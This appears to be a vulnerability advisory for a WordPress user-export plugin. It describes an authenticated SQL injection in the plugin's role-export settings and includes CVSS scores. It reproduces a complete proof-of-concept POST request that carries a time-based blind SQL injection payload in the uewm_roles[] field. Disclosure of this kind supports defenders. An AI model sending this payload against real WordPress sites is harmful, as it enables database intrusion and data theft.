7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.
POST /wp-admin/users.php?page=uewm_settings HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591
Content-Length: 1309
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_roles[]"
editor'%20AND%20(select*from(select(sleep(10)))a)+'
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_use_custom_csv_settings"
1
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_field_separator"
custom
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_field_separator"
=
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_text_qualifier"
double-quote
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_text_qualifier"
"
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="save"
Save changes
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wpnonce"
0c475bfd14
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/users.php?page=uewm_settings
-----------------------------91314853327906118943368521591--
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P